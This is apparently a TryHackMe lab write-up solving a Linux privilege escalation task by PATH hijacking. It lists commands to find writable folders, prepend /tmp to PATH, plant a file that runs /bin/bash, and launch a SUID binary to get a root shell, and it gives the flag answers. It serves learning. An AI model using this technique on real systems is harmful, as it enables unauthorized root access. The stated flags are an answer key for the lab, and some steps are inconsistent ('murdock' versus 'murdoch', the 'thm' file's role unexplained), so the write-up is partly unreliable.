This article discusses the solution for TryHackMe's Linux Privilege Escalation PATH task, so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation PATH
Notes:
- Exploit PATH folders that we have write access to.
- See if you can modify PATH so you can add folders that you have write access to.
- Binaries run from PATH are usually run under root privileges.
- Copy a binary into the folder indicated in PATH, then run a binary containing "/bin/bash" to create a root-enabled shell.
What is the odd folder you have write access for?
- Run the following command to find write access for your user.
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
Running it doesn't provide the answer we need, so let's go 1 level deeper:
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
Answer: home/murdock
What is the content of the flag6.txt file?
- First run the following to see the path:
echo $PATH
- Let's see if we have any write permissions in any of the $PATH directories.
find / -writable 2>/dev/null | cut -d "/" -f 2,3,4 | grep usr | sort -u
Unfortunately, the writable usr/lib/systemd is not included in the PATH.
We will add /tmp to the front of the PATH by running the following command:
export PATH=/tmp:$PATH
- Execute the following commands:
cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
- Execute the following, which will grant you a root-access bash terminal:
cd /home/murdoch/
./test
- Execute:
cat /home/matt/flag6.txt
Answer: THM-736628929
Until next time. Keep learning.
Stay stoked and code. :)